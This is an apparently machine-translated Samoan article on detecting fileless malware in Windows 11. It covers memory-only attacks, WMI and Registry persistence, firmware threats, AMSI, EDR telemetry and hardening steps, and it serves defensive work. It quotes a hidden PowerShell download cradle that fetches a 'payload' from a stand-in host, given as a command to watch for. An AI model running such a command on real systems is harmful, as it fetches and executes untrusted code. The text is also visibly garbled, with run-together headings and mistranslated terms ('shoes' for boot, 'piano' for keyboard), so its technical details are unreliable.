E faʻafefea ona iloa mea leaga e leai ni faila i totonu Windows 11

¿E fa'afefea ona iloa mea leaga e leai ni faila? Ua matua faatupulaia le gaioiga o osofaiga e leai ni faila, ma ua atili ai ona leaga, E le puipuia le Windows 11O lenei faiga e alo ese ai le tisiki ma faʻalagolago i le manatua ma mea faigaluega faʻatulafonoina; o le mafuaaga lena e tauivi ai polokalame antivirus e faavae saini. Afai o loʻo e suʻeina se auala faʻalagolago e iloa ai, o le tali e taoto i le tuʻufaʻatasia telemetry, suʻesuʻega o amioga, ma faʻatonuga a le Windows.

I le si'osi'omaga o lo'o iai nei, o fa'asalalauga e fa'aleagaina ai le PowerShell, WMI, po'o le Mshta o lo'o ola fa'atasi ma isi faiga fa'apitoa e pei o tui fa'amanatu, fa'aauau "e aunoa ma le pa'i" i le tisiki, ma e o'o lava. fa'aleagaina o firmwareO le ki o le malamalama i le faʻafanua taufaʻatau, vaega osofaʻiga, ma faʻailoga latou te o ese e tusa lava pe tutupu mea uma i totonu o le RAM.

O le a le mea e leai se faila faila ma aisea e popole ai i totonu Windows 11?

Pe a tatou talanoa e uiga i "leai se faila" taufaamataʻu, o loʻo tatou faʻatatau i tulafono leaga E te le manaʻomia le teuina o mea fou e mafai ona e faia i le faiga faila e faagaoioia. E masani lava ona tui i faiga faʻagasolo ma faʻatinoina i le RAM, faʻalagolago i faʻamatalaga ma binaries sainia e Microsoft (faʻataʻitaʻiga, PowerShell, WMI, rundll32, mshtaOle mea lea e fa'aitiitia ai lou tulagavae ma fa'ataga ai oe e fa'asolo afi e na'o faila masalomia.

E oʻo lava i faʻamaumauga a le ofisa poʻo PDFs e faʻaaogaina faʻafitauli e faʻalauiloa ai tulafono e manatu o se vaega o le mea mataʻutia, aua fa'agaoioi le fa'atinoga i le manatua e aunoa ma le tuua o binaries aoga mo le auiliiliga. Fa'aleagaina o macros ma DDE I le Ofisa, talu ai o loʻo faʻagasolo le tulafono i faiga faʻatulafonoina e pei o WinWord.

E tuʻufaʻatasia e le au osofaʻi faʻainisinia faʻaagafesootai (phishing, spam links) ma mailei faʻapitoa: o le kiliki a le tagata faʻaoga e amata ai se filifili e sii mai ai se tusitusiga ma faʻatino ai le uta mulimuli i le mafaufau, aloese mai le tuua o se faailoga i luga o le tisiki. O fa'amoemoega e amata mai i le gaoi o fa'amaumauga i le fa'atinoina o le ransomware, i le fa'agaoioiga lemu i tua.

Tulaga e ala i tulagavae i le faiga: mai le 'mama' i hybrids

Ina ia aloese mai manatu fenumiai, e aoga le tuueseeseina o taufaamataʻu e ala i lo latou tikeri o fegalegaleaiga ma le faila faila. O lenei fa'avasegaga e fa'amanino O le a le mea o loʻo faʻaauau, o fea e nofo ai le code, ma o a faʻailoga e tuʻu ai?.

Ituaiga I: leai se faila faila

E leai se mea e tusia e malware e leai ni faila i le tisiki. O se fa'ata'ita'iga masani o le fa'aaogaina a feso'ota'iga vaivai (pei o le EternalBlue vector i tua i le aso) e faʻatino ai se pito i tua o loʻo nofo i le fatu fatu (mataupu e pei o DoublePulsar). O iinei, o mea uma e tupu i le RAM ma e leai ni mea faʻapitoa i le faila faila.

O le isi filifiliga o le faʻaleagaina o le firmware o vaega: BIOS / UEFI, fesoʻotaʻiga fesoʻotaʻiga, USB peripherals (BadUSB-type techniques) poʻo le CPU subsystems. Latou te faʻaauau pea e ala i restarts ma toe faʻapipiʻi, faʻatasi ai ma le faigata faʻaopoopo lena O nai oloa e siakia firmwareO osofaʻiga lavelave ia, e le masani, ae mataʻutia ona o lo latou faʻamalosi ma le tumau.

Ituaiga II: Gaioiga e teu tuusao

Iinei, e le "tuua" e le malware lona lava faʻaogaina, ae faʻaaogaina pusa e pulea e le polokalama e teuina e fai ma faila. Mo se faʻataʻitaʻiga, pito i tua o le laau powershell poloaiga i le fale teu oloa WMI ma faʻaoso lona faʻataunuʻuina i mea faʻapitoa. E mafai ona faʻapipiʻi mai le laina faʻatonu e aunoa ma le tuʻuina o binaries, ae o le WMI repository o loʻo nofo i luga o le disk e avea o se faʻamaumauga faʻamaonia, e faigata ai ona faʻamama e aunoa ma le afaina o le faiga.

Mai se vaaiga faʻapitoa e manatu e leai ni faila, aua o lena pusa (WMI, Resitala, ma isi) E le o se fa'ata'ita'iga e mafai ona fa'atinoina Ma o lona faamamaina e le o se mea faatauvaa. Le taunu'uga: fa'amalosi fa'amalosi ma sina 'aga masani'.

Ituaiga III: Manaomia faila e galue

O nisi tulaga e tausia a tumau 'leai se faila' I se tulaga talafeagai, latou te manaʻomia se faʻavae faila. O le fa'ata'ita'iga masani o Kovter: e fa'amauina se veape atigi mo se fa'aopoopoga fa'afuase'i; pe a tatalaina se faila ma lena faʻaopoopoga, o se tamai tusitusiga e faʻaaoga ai mshta.exe ua faʻalauiloaina, lea e toe faʻaleleia ai le manoa leaga mai le Resitala.

O le togafiti o nei faila "maunu" ma faʻaopoopoga faʻafuaseʻi e le o iai se uta faʻavasegaina, ma o le tele o le code o loʻo nofo i le faamauina (se isi koneteina). O le mea lena ua fa'avasegaina ai e leai ni faila i le a'afiaga, e ui lava ina fa'amoemoe e fa'alagolago i le tasi po'o le sili atu o mea fa'a-tisiki e fai ma fa'aoso.

Vectors ma 'au' o faʻamaʻi: o fea e ulu atu ai ma le mea e lafi ai

Ina ia faʻaleleia atili le suʻesuʻeina, e taua tele le faʻafanua o le nofoaga e ulu atu ai ma le nofoaga o le faʻamaʻi. O lenei vaaiga e fesoasoani i le mamanu fa'atonuga fa'apitoa Fa'amuamua le telemetry talafeagai.

exploits

• Fa'avae faila (Ituaiga III): Pepa, executables, talatuu Flash/Java faila, po o faila LNK e mafai ona faʻaogaina le browser poʻo le afi e faʻaogaina ai latou e utaina le shellcode i le mafaufau. O le vector muamua o se faila, ae o le uta e alu i le RAM.
• Fa'avae feso'ota'iga (Ituaiga I): O se afifi e faʻaaogaina se faʻafitauli (faʻataʻitaʻiga, i le SMB) e ausia le faʻataunuʻuina i le userland poʻo le fatu. Na fa'alauiloa e WannaCry lenei faiga. Fa'atonu uta manatua leai se faila fou.

o masini

• Lelei (Ituaiga I): Tiki po'o le firmware card network e mafai ona suia ma fa'aofi le code. Faigata ona su'esu'e ma fa'aauau i fafo o le OS.
• PPU ma pulega vaega laiti (Ituaiga I): Tekinolosi pei ole Intel's ME/AMT ua fa'aalia auala i Fesootaiga ma faʻatinoga i fafo atu o le OSE osofai i se tulaga maualalo, ma maualuga le mafai ona gaoia.
• USB (Ituaiga I): BadUSB e mafai ai ona e toe fa'apolokalameina se ta'avale USB e fa'afoliga i se piano po'o le NIC ma fa'alauiloa ai fa'atonuga po'o le toe fa'atonuina o feoaiga.
• BIOS / UEFI (Ituaiga I): toe faʻaogaina le firmware leaga (mataupu e pei o Mebromi) e taʻavale i luma o seevae Windows.
• Faufautua (Ituaiga I): Fa'atino se tama'i-hypervisor i lalo ole OS e natia ai lona iai. E seasea, ae ua uma ona matauina i foliga o hypervisor rootkits.

Faʻasalaga ma tui

• Fa'avae faila (ituaiga III): EXE/DLL/LNK po'o galuega fa'atulagaina e fa'alauiloa tui i faiga fa'atulafonoina.
• macros (Ituaiga III): VBA i le Ofisa e mafai ona fa'avasega ma fa'atino uta, e aofia ai ransomware atoa, fa'atasi ai ma le fa'atagaga a le tagata fa'aoga e ala i le fa'a'ole'ole.
• Lisi (ituaiga II): PowerShell, VBScript poʻo JScript mai le faila, laina faʻatonu, auaunaga, Resitala po'o WMIE mafai e le tagata osofaʻi ona lolomi le tusitusiga i se taimi mamao e aunoa ma le paʻi i le disk.
• Fa'amaufa'ailoga (MBR/Boot) (Ituaiga II): O aiga e pei o Petya e suitulaga le vaega o seevae e pulea i le amataga. E i fafo atu o le faila faila, ae mafai ona maua i le OS ma fofo faʻaonaponei e mafai ona toe faʻafoʻisia.

Fa'afefea ona fa'agaoioi osofa'iga e leai ni faila: vaega ma fa'ailoga

E ui lava latou te le tuʻua faila e mafai ona faʻatinoina, ae o faʻasalalauga e mulimuli i se faʻasologa faʻavae. O le malamalama ia i latou e mafai ai ona mataituina. mea tutupu ma sootaga i le va o faiga e tuua ai se faailoga.

• Uluai avanoaFa'asao fa'apolokalame e fa'aoga so'otaga po'o mea fa'apipi'i, upegatafa'ilagi fa'aletonu, po'o fa'ailoga gaoia. O le tele o filifili e amata i se pepa Ofisa e fa'aosoina ai se fa'atonuga PowerShell.
• Tutumau: pito i tua e ala i le WMI (filifiliga ma saofaga), Ki fa'atinoga o le Resitala po'o galuega fa'atulagaina e toe fa'alauiloa ai tusitusiga e aunoa ma se faila leaga fou.
• ExfiltrationO le taimi lava e aoina ai faʻamatalaga, e lafo atu i fafo mai le fesoʻotaʻiga e faʻaaoga ai faiga faʻalagolago (suʻesuʻe, PowerShell, bitsadmin) e faʻafefiloi ai fefaʻatauaiga.

O lenei mamanu e sili ona taufaasese aua o le fa'ailoga osofa'i Latou te lalafi i tulaga masani: fa'atonuga-laina finauga, fa'agasologa o filifili, feso'ota'iga fa'aletonu i fafo, po'o le avanoa i tui API.

Auala masani: mai le manatua i le pueina

E fa'alagolago le au fai ata i le tele o metotia e optimize stealth. E fesoasoani le iloa o mea sili ona taatele e fa'agaoioi ai le su'esu'ega lelei.

• Nofo i manatuaga: utaina o uta i le avanoa o se faagasologa faatuatuaina o loo faatalitali mo le faatoaagaina. rootkits ma matau I totonu o le fatu, latou te siitia le maualuga o le natia.
• Tumau i le ResitalaFa'asaoina pa'u fa'ailoga i totonu o ki ma toe fa'asusu mai se fa'amatagofie (mshta, rundll32, wscript). O le ephemeral installer e mafai ona faʻaumatia e ia lava e faʻaitiitia ai lona tulagavae.
• Fa'amatalaga fa'akomepiutaI le fa'aaogaina o igoa fa'aigoa ma upu fa'apolopolo ua gaoia, e fa'atino ai e le tagata osofa'i atigi atigi ma la'au avanoa filemu i le Resitala poʻo le WMI.
• 'Leai se faila' RansomwareO fesoʻotaʻiga faʻamaonia ma C2 e faʻapipiʻiina mai le RAM, faʻaitiitia avanoa mo le suʻeina seia oʻo ina iloa le faʻaleagaina.
• Pusa fa'agaioiga: filifili otometi e iloa ai faʻafitauli ma faʻapipiʻi uta naʻo manatua pe a uma ona kiliki e le tagata faʻaoga.
• Pepa ma fa'ailoga: macros ma masini e pei o le DDE e faʻaosoina ai faʻatonuga e aunoa ma le faʻasaoina o mea e mafai ona faʻaogaina i le disk.

O suʻesuʻega faʻapisinisi ua uma ona faʻaalia ni tumutumu iloga: i le tasi vaitau o le 2018, a si'itia i luga ole 90% i osofaʻiga faʻavae ma le PowerShell filifili, o se faʻailoga e sili atu le vector mo lona aoga.

Le luʻitau mo kamupani ma faʻatau oloa: aisea e le lava ai le poloka

O le a faaosoosoina le faʻamalo PowerShell pe faʻasa macros e faʻavavau, ae E te motusia le taotogaO le PowerShell ose poutu ole pulega fa'aonaponei ma e taua tele le Ofisa ile pisinisi; poloka tauaso e masani ona le mafai.

E le gata i lea, o loʻo i ai auala e faʻafefe ai faʻatonuga masani: faʻaogaina le PowerShell e ala i DLL ma rundll32, faʻapipiʻi tusitusiga i EXEs, Aumai lau lava kopi o le PowerShell po'o le natia fo'i tusitusiga i ata ma fa'amana'o. O le mea lea, o le puipuiga e le mafai ona faʻavae naʻo le faʻafitia o le i ai o meafaigaluega.

O le isi mea sese masani o le tuʻuina atu o le filifiliga atoa i le ao: afai e tatau ona faʻatali le sooupu mo se tali mai le 'auʻaunaga, E te leiloa le puipuiga o le taimi moniTelemetry faʻamatalaga e mafai ona tuʻuina atu e faʻatamaoaigaina ai faʻamatalaga, ae o le E tatau ona tupu le faʻaitiitia i le pito.

E faʻafefea ona iloa mea leaga e leai ni faila i totonu Windows 11: telemetry ma amioga

Ole fuafuaga manumalo ole mataituina faiga ma manatuaE le o faila. O amioga leaga e sili atu ona mautu nai lo foliga o se faila e fai, e faʻaogaina lelei mo masini puipuia.

• AMSI (Faiga Va'aiga Va'aiga Antimalware)E fa'alavelaveina fa'amaumauga a le PowerShell, VBScript, po'o le JScript e tusa lava pe fa'amalosia malosi i le mafaufau. Lelei mo le pueina o manoa faanenefu a'o le'i fa'atinoina.
• Mataituina o faagasologa: amata/faauma, PID, matua ma fanau, auala, laina fa'atonu ma fa'ailoga, fa'atasi ai ma la'au fa'atau e malamalama ai i le tala atoa.
• Iloiloga manatua: su'esu'eina o tui, fa'afoliga po'o uta PE e aunoa ma le pa'i i le tisiki, ma toe iloilo vaega e le masani ai fa'atinoina.
• Puipuiga vaega amata: pulea ma le toe faʻaleleia o le MBR / EFI i le tulaga o le faʻalavelave.

I totonu o le faʻalapotopotoga faʻanatura a Microsoft, Defender for Endpoint e tuʻufaʻatasia le AMSI, mataituina amiogaE fa'aogaina le su'esu'ega o le mafaufau ma le a'oa'oina o masini e fa'atatau i le ao e fua ai fa'amatalaga e fa'atatau i suiga fou pe fa'anenefu. O isi tagata fa'atau oloa latou te fa'aogaina auala fa'apena i masini e nonofo ai fatu.

Fa'ata'ita'iga moni o feso'ota'iga: mai le pepa i le PowerShell

Va'ai faalemafaufau i se filifili e sau ai e Outlook se mea fa'apipi'i, tatala e Word le pepa, fa'agaoioi mea e mafai, ma fa'alauiloa le PowerShell ma ni fa'ailoga masalosalo. Telemetry talafeagai o le a faʻaalia ai le Laina poloaʻiga (fa'ata'ita'iga, ExecutionPolicy Bypass, fa'amalama natia), fa'afeso'ota'i i se vaega e le fa'atuatuaina ma fa'atupuina se faiga a tamaiti e fa'apipi'i i totonu o le AppData.

E mafai e se sui e iai le fa'alapotopotoga fa'apitonu'u taofi ma liliu gaioiga leaga e aunoa ma le faʻaogaina o le tusi, faʻaopoopo i le logoina o le SIEM poʻo le imeli / SMS. O nisi oloa e faʻaopoopoina se faʻavae faʻavae faʻavae (StoryLine-type models), lea e le faʻasino i le faʻagasologa vaaia (Outlook/Word), ae i le filo leaga atoa ma lona amataga e faamama atoatoa le faiga.

O se faʻataʻitaʻiga masani o le faʻatonuga e mataʻituina ai atonu e pei o lenei: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logic e le o le manoa tonu, ae le seti o faailo: fa'alilolilo faiga fa'avae, fa'amalama natia, fa'asolo manino, ma le fa'ataunu'uina i totonu.

AMSI, paipa ma matafaioi a tagata taʻitoʻatasi: mai le pito iʻuga i le SOC

I tua atu o le pueina o tusitusiga, o se fausaga malosi e faʻatulagaina laasaga e faʻafaigofie ai suʻesuʻega ma tali. O le tele o faʻamaoniga aʻo leʻi faʻatinoina le uta, o le sili atu lea., sili

• Fa'alavelave fa'amatalagaO le AMSI e tuʻuina atu le anotusi (tusa lava pe faʻatupuina i luga o le lele) mo suʻesuʻega faʻapitoa ma faʻamalosi i totonu o se paipa leaga.
• Fa'agasolo mea tutupuPIDs, binaries, hashes, auala, ma isi faʻamatalaga e aoina. finauga, faʻavaeina o laʻau faʻagasologa na tau atu i le uta mulimuli.
• Su'esu'ega ma lipotiO su'esu'ega o lo'o fa'aalia i luga o le fa'amafanafanaga o oloa ma tu'uina atu i luga o feso'ota'iga (NDR) mo fa'aaliga fa'alauiloa.
• Fa'amaonia e le tagata fa'aogaE tusa lava pe tui se tusitusiga i le mafaufau, o le auivi Ua taofia e le AMSI i lomiga talafeagai o Windows.
• Malosiaga o le pule: fa'atulagaina o faiga fa'avae e mafai ai ona asiasia tusitusiga, poloka fa'avae amio ma le fatuina o lipoti mai le faʻamafanafanaga.
• Galuega SOC: fa'aputuina o mea fa'apitoa (VM UUID, OS version, script type, initiator process and its parent, hasshes and command lines) e toe fa'atupu le tala fa'asolopito ma si'i tulafono lumanai.

A fa'atagaina e le fa'avae le auina atu i fafo o le puipui manatua Faatasi ai ma le faʻataunuʻuina, e mafai e tagata suʻesuʻe ona faʻaalia ni suʻesuʻega fou ma faʻatamaoaigaina le puipuiga mai suiga tutusa.

Faiga fa'atino ile Windows 11: puipuiga ma tuliga

I le faʻaopoopoga i le iai o le EDR ma suʻesuʻega manatua ma le AMSI, Windows 11 faʻatagaina oe e tapunia avanoa osofaʻi ma faʻaleleia le vaʻaia ma pulega fa'alenu'u.

• Le resitalaina ma faʻatapulaʻaina i le PowerShellFa'aagaoioi le Script Block Logging ma le Module Logging, fa'aogaina faiga fa'atapula'a pe a mafai, ma pulea le fa'aogaina o Pasia/Natia.
• Tulafono Fa'aitiitiga Fa'asagaga (ASR).: poloka fa'amatalaga fa'alauiloa e ala ile Ofisa ma Fa'aleagaina WMI/PSExec pe a le manaʻomia.
• faiga fa'avae a le Ofisa: fa'aletonu ona o le faaletonu, saini macro i totonu ma lisi mautu fa'alagolago; mata'ituina le tafeaga DDE.
• WMI Su'etusi ma Resitala: mataʻituina faʻasalalauga faʻapitoa ma ki faʻataunuʻu otometi (Run, RunOnce, Winlogon), faʻapea foʻi ma le fausiaina o galuega faʻatulagaina.
• Puipuiga amata: fa'agaoioia Secure Boot, siaki MBR/EFI fa'amaoni ma fa'amaonia e leai ni suiga ile amataga.
• Totogi ma faamaaaina: tapunia fa'alavelave fa'aogaina i su'esu'ega, vaega Ofisa, ma 'au'aunaga feso'otaiga.
• Fa'alauiloa: toleniina tagata fa'aoga ma 'au fa'atekinisi i phishing ma fa'ailoga o fasiotiga faalilolilo.

Mo le tuliga, taula'i i fesili e uiga i: fa'atupuina faiga a le Ofisa aga'i i le PowerShell/MSHTA, finauga ma downloadstring/downloadfileFa'amatalaga ma'oti manino, tui fa'afoliga, ma feso'ota'iga i fafo i TLD masalomia. Feso'ota'i fa'ailoga nei fa'atasi ma le ta'uleleia ma fa'atele e fa'aitiitia ai le pisa.

O a mea e mafai ona iloa e afi ta'itasi i aso nei?

O fa'afitauli tau atina'e a Microsoft e tu'ufa'atasia le AMSI, su'esu'ega tau amio, su'esu'e manatua ma le puipuiga o vaega ta'avale, fa'atasi ai ma fa'ata'ita'iga ML fa'avae ao e fa'asaga i fa'amata'u fa'amata'u. O isi tagata fa'atau oloa latou te fa'atinoina le mata'ituina o le kernel-level e fa'a'ese'ese ai le leaga mai le fa'aogaina o polokalame fa'atasi ma le toe fa'afo'i otometi o suiga.

O se faiga e faavae i luga tala o le faasalaga E mafai ai e oe ona iloa le mafuaʻaga (mo se faʻataʻitaʻiga, o se faʻapipiʻi Outlook e faʻaosoina ai se filifili) ma faʻaititia le laʻau atoa: tusitusiga, ki, galuega, ma binaries vavalalata, aloese mai le pipii i le faʻailoga vaaia.

Mea masani masani ma le auala e aloese ai

O le polokaina o le PowerShell e aunoa ma se isi fuafuaga tau pulega e le gata ina le aoga, ae e iai foi auala e fa'atalosaga fa'aliloliloE fa'atatau fo'i i macros: pe e te fa'afoeina i faiga fa'avae ma saini, pe o le a pagatia le pisinisi. E sili atu le taulaʻi i le telemetry ma tulafono o amioga.

O le isi mea sese masani o le talitonuina o talosaga papa'e e fo'ia mea uma: e fa'alagolago tonu le tekonolosi faila i lenei mea. apps faatuatuainaE tatau i le pulega ona mataituina mea latou te faia ma pe faapefea ona latou fesootai, ae le na o le faatagaina.

Faatasi ai ma mea uma o loʻo taʻua i luga, o faila faila leaga e le toe avea ma "agaga" pe a e mataʻituina le mea e sili ona taua: amio, manatua ma tupuaga o faasalaga taitasi. O le tu'ufa'atasia o le AMSI, telemetry process tele, fa'ale-aganu'u Windows 11 fa'atonuga, ma se fa'afanua EDR fa'atasi ai ma su'esu'ega tau amio e te maua ai le avanoa. Fa'aopoopo i le fa'atusa faiga fa'atatau mo macros ma PowerShell, WMI/Registry su'etusi, ma tuliga e fa'amuamua laina fa'atonu ma fa'agasolo la'au, ma e iai sau puipuiga e tipi ai nei filifili a'o le'i fa'alogoina.